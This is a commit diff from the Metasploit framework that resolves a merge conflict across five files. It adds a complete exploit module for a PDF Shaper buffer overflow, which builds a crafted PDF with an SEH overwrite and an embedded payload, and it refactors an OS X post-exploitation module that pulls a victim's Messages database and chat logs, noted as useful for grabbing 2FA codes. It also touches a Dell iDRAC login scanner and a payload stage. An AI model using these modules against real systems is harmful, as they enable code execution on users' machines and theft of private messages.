Resolve merge conflict

bug/bundler_fix
wchen-r7 2016-11-30 14:33:23 -06:00
commit 56505d2cc1
5 changed files with 172 additions and 95 deletions

View File

@ -138,7 +138,7 @@ class Msf::Payload::UUID
raise ArgumentError, "Raw UUID must be at least 16 bytes" raise ArgumentError, "Raw UUID must be at least 16 bytes"
end end
puid, plat_xor, arch_xor, plat_id, arch_id, tstamp = raw.unpack('A8C4N') puid, plat_xor, arch_xor, plat_id, arch_id, tstamp = raw.unpack('a8C4N')
plat = find_platform_name(plat_xor ^ plat_id) plat = find_platform_name(plat_xor ^ plat_id)
arch = find_architecture_name(arch_xor ^ arch_id) arch = find_architecture_name(arch_xor ^ arch_id)
time_xor = [plat_xor, arch_xor, plat_xor, arch_xor].pack('C4').unpack('N').first time_xor = [plat_xor, arch_xor, plat_xor, arch_xor].pack('C4').unpack('N').first

View File

@ -77,6 +77,7 @@ class MetasploitModule < Msf::Auxiliary
password: pass, password: pass,
proof: auth.body.to_s proof: auth.body.to_s
) )
return :next_user
else else
print_error("#{target_url} - Dell iDRAC - Failed to login as '#{user}' with password '#{pass}'") print_error("#{target_url} - Dell iDRAC - Failed to login as '#{user}' with password '#{pass}'")
end end

View File

@ -0,0 +1,121 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::PDF
include Msf::Exploit::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'PDF Shaper Buffer Overflow',
'Description' => %q{
PDF Shaper is prone to a security vulnerability when processing PDF files.
The vulnerability appear when we use Convert PDF to Image and use a specially
crafted PDF file. This module has been tested successfully on Win Xp, Win 7,
Win 8, Win 10.
},
'License' => MSF_LICENSE,
'Author' =>
[
'metacom27[at]gmail.com - twitter.com/m3tac0m', # POC
'metacom' # MSF Module
],
'References' =>
[
['URL', 'https://www.exploit-db.com/exploits/37760/']
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process', # none/process/thread/seh
},
'Platform' => 'win',
'Payload' =>
{
'Space' => 2000,
'DisableNops' => true
},
'Targets' =>
[
['<Win Xp, Win 7, Win 8, Win 10 / PDF Shaper v.3.5 and v.3.6>',
{
'Ret' => 0x00402AC1, # PDFTools.exe
'Offset' => 433
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Oct 03 2015',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('FILENAME', [false, 'The file name.', 'msf.pdf'])
], self.class
)
end
def exploit
file_create(make_pdf)
end
def jpeg
buffer = "\xFF\xD8\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65\x00\x64\x80\x00\x00"
buffer << "\x00\x02\xFF\xDB\x00\x84\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02"
buffer << "\x02\x03\x02\x02\x02\x03\x04\x03\x03\x03\x03\x04\x05\x04\x04\x04"
buffer << "\x04\x04\x05\x05\x05\x05\x05\x05\x05\x05\x05\x05\x07\x08\x08\x08"
buffer << "\x07\x05\x09\x0A\x0A\x0A\x0A\x09\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x0C"
buffer << "\x0C\x0C\x0C\x0C\x0C\x0C\x0C\x01\x03\x02\x02\x03\x03\x03\x07\x05"
buffer << "\x05\x07\x0D\x0A\x09\x0A\x0D\x0F\x0D\x0D\x0D\x0D\x0F\x0F\x0C\x0C"
buffer << "\x0C\x0C\x0C\x0F\x0F\x0C\x0C\x0C\x0C\x0C\x0C\x0F\x0C\x0E\x0E\x0E"
buffer << "\x0E\x0E\x0C\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11\x11"
buffer << "\x11\x11\x11\x11\x11\x11\x11\x11\xFF\xC0\x00\x14\x08\x00\x32\x00"
buffer << "\xE6\x04\x01\x11\x00\x02\x11\x01\x03\x11\x01\x04\x11\x00\xFF\xC4"
buffer << "\x01\xA2\x00\x00\x00\x07\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00"
buffer << "\x00\x00\x00\x04\x05\x03\x02\x06\x01\x00\x07\x08\x09\x0A\x0B\x01"
buffer << "\x54\x02\x02\x03\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00"
buffer << "\x01\x00\x02\x03\x04\x05\x06\x07"
buffer << rand_text(target['Offset']) # junk
buffer << generate_seh_record(target.ret)
buffer << payload.encoded
buffer << rand_text(2388 - payload.encoded.length)
buffer
end
def make_pdf
@pdf << header
add_object(1, "<</Type/Catalog/Outlines 2 0 R /Pages 3 0 R>>")
add_object(2, "<</Type/Outlines>>")
add_object(3, "<</Type/Pages/Kids[5 0 R]/Count 1/Resources <</ProcSet 4 0 R/XObject <</I0 7 0 R>>>>/MediaBox[0 0 612.0 792.0]>>")
add_object(4, "[/PDF/Text/ImageC]")
add_object(5, "<</Type/Page/Parent 3 0 R/Contents 6 0 R>>")
stream_1 = "stream" << eol
stream_1 << "0.000 0.000 0.000 rg 0.000 0.000 0.000 RG q 265.000 0 0 229.000 41.000 522.000 cm /I0 Do Q" << eol
stream_1 << "endstream" << eol
add_object(6, "<</Length 91>>#{stream_1}")
stream = "<<" << eol
stream << "/Width 230" << eol
stream << "/BitsPerComponent 8" << eol
stream << "/Name /X" << eol
stream << "/Height 50" << eol
stream << "/Intent /RelativeColorimetric" << eol
stream << "/Subtype /Image" << eol
stream << "/Filter /DCTDecode" << eol
stream << "/Length #{jpeg.length}" << eol
stream << "/ColorSpace /DeviceCMYK" << eol
stream << "/Type /XObject" << eol
stream << ">>"
stream << "stream" << eol
stream << jpeg << eol
stream << "endstream" << eol
add_object(7, stream)
finish_pdf
end
end

View File

@ -82,6 +82,6 @@ module MetasploitModule
def generate_stage(opts = {}) def generate_stage(opts = {})
opts[:uuid] ||= generate_payload_uuid opts[:uuid] ||= generate_payload_uuid
MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', opts.slice(:uuid, :url, :debug, :log_file)). MetasploitPayloads::Mettle.new('armv5l-linux-musleabi', opts.slice(:uuid, :url, :debug, :log_file)).
to_bininary :process_image to_binary :process_image
end end
end end

View File

@ -12,22 +12,22 @@ class MetasploitModule < Msf::Post
super(update_info(info, super(update_info(info,
'Name' => 'OS X Gather Messages', 'Name' => 'OS X Gather Messages',
'Description' => %q{ 'Description' => %q{
This module will collect the Messages sqlite3 database files and chat logs This module will collect the Messages sqlite3 database files and chat logs
from the victim's machine. There are four actions you may choose: DBFILE, from the victim's machine. There are four actions you may choose: DBFILE,
READABLE, LATEST and ALL. DBFILE and READABLE will retrieve all messages and READABLE, LATEST, and ALL. DBFILE and READABLE will retrieve all messages, and
LATEST will retrieve the last X number of message (useful with 2FA). Module LATEST will retrieve the last X number of messages (useful with 2FA). Module
was tested with OSX 10.11 (El Capitan). was tested with OS X 10.11 (El Capitan).
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'Geckom <geckom[at]redteamr.com>'], 'Author' => ['Geckom <geckom[at]redteamr.com>'],
'Platform' => [ 'osx' ], 'Platform' => ['osx'],
'SessionTypes' => [ "meterpreter", "shell" ], 'SessionTypes' => ['meterpreter', 'shell'],
'Actions' => 'Actions' =>
[ [
['DBFILE', { 'Description' => 'Collect messages DB file' } ], ['DBFILE', 'Description' => 'Collect Messages DB file'],
['READABLE', { 'Description' => 'Collect messages DB and download in a readable format' } ], ['READABLE', 'Description' => 'Collect Messages DB and download in a readable format'],
['LATEST', { 'Description' => 'Collect the latest message' } ], ['LATEST', 'Description' => 'Collect the latest message'],
['ALL', { 'Description' => 'Collect all messages data'}] ['ALL', 'Description' => 'Collect all Messages data']
], ],
'DefaultAction' => 'ALL' 'DefaultAction' => 'ALL'
)) ))
@ -35,10 +35,42 @@ class MetasploitModule < Msf::Post
register_options( register_options(
[ [
OptInt.new('MSGCOUNT', [false, 'Number of latest messages to retrieve.', 3]), OptInt.new('MSGCOUNT', [false, 'Number of latest messages to retrieve.', 3]),
OptString.new('USER', [false, 'Username to retrieve messages from (defaults to current user)', 'CURRENT']) OptString.new('USER', [false, 'Username to retrieve messages from (defaults to current user)'])
], self.class) ]
)
end end
def run
if datastore['USER']
user = datastore['USER']
else
user = cmd_exec('/usr/bin/whoami')
end
# Check file exists
messages_path = "/Users/#{user}/Library/Messages/chat.db"
if file_exist?(messages_path)
print_good("#{peer} - Messages DB found: #{messages_path}")
else
fail_with(Failure::Unknown, "#{peer} - Messages DB does not exist")
end
# Check messages. And then set the default profile path
unless messages_path
fail_with(Failure::Unknown, "#{peer} - Unable to find messages, will not continue")
end
print_good("#{peer} - Found Messages file: #{messages_path}")
files = []
# Download file
files << get_db(messages_path) if action.name =~ /ALL|DBFILE/i
files << readable(messages_path) if action.name =~ /ALL|READABLE/i
files << latest(messages_path) if action.name =~ /ALL|LATEST/i
save(files)
end
# #
# Collect messages db file. # Collect messages db file.
@ -49,7 +81,6 @@ class MetasploitModule < Msf::Post
{filename: 'messages.db', mime: 'bin', data: message_data} {filename: 'messages.db', mime: 'bin', data: message_data}
end end
# #
# Generate a readable version of the messages DB # Generate a readable version of the messages DB
# #
@ -68,7 +99,7 @@ class MetasploitModule < Msf::Post
'ORDER BY m.date;' 'ORDER BY m.date;'
] ]
sql = sql.join(' ') sql = sql.join(' ')
readable_data = exec_shell_cmd("sqlite3 #{messages_path} '#{sql}'") readable_data = cmd_exec("sqlite3 #{messages_path} '#{sql}'")
{filename: 'messages.txt', mime: 'text/plain', data: readable_data} {filename: 'messages.txt', mime: 'text/plain', data: readable_data}
end end
@ -90,7 +121,7 @@ class MetasploitModule < Msf::Post
"ORDER BY m.date DESC LIMIT #{datastore['MSGCOUNT']};" "ORDER BY m.date DESC LIMIT #{datastore['MSGCOUNT']};"
] ]
sql = sql.join(' ') sql = sql.join(' ')
latest_data = exec_shell_cmd("sqlite3 #{messages_path} '#{sql}'") latest_data = cmd_exec("sqlite3 #{messages_path} '#{sql}'")
print_good("#{peer} - Latest messages: \n#{latest_data}") print_good("#{peer} - Latest messages: \n#{latest_data}")
{filename: 'latest.txt', mime: 'text/plain', data: latest_data} {filename: 'latest.txt', mime: 'text/plain', data: latest_data}
end end
@ -112,80 +143,4 @@ class MetasploitModule < Msf::Post
end end
end end
#
# Return an array or directory names
#
def dir(path)
results = []
subdirs = exec_shell_cmd("ls -l #{path}")
unless subdirs =~ /No such file or directory/
results = subdirs.scan(/[A-Z][a-z][a-z]\x20+\d+\x20[\d\:]+\x20(.+)$/).flatten
end
results
end
#
# This is just a wrapper for cmd_exec(), except it chomp() the output,
# and retry under certain conditions.
#
def exec_shell_cmd(cmd)
begin
out = cmd_exec(cmd).chomp
rescue ::Timeout::Error => e
vprint_error("#{peer} - #{e.message} - retrying...")
retry
rescue EOFError => e
vprint_error("#{peer} - #{e.message} - retrying...")
retry
end
end
#
def locate_messages(base)
dir(base).each do |folder|
m = folder.match(/(Messages)$/)
if m
m = m[0].gsub(/\x20/, "\\\\ ") + "/"
return "#{base}#{m}"
end
end
nil
end
def run
if datastore['USER'] == 'CURRENT'
user = exec_shell_cmd("/usr/bin/whoami")
else
user = datastore['USER']
end
# Check file exists
messages_path = "/Users/#{user}/Library/Messages/chat.db"
if file_exist?(messages_path)
print_good("#{peer} - Messages DB found: #{messages_path}")
else
fail_with(Failure::Unknown, "#{peer} - Messages DB does not exist")
end
# Check messages. And then set the default profile path
unless messages_path
fail_with(Failure::Unknown, "#{peer} - Unable to find messages, will not continue")
end
print_good("#{peer} - Found messages file: #{messages_path}")
files = []
# Download file
files << get_db(messages_path) if action.name =~ /ALL|DBFILE/i
files << readable(messages_path) if action.name =~ /ALL|READABLE/i
files << latest(messages_path) if action.name =~ /ALL|LATEST/i
save(files)
end
end end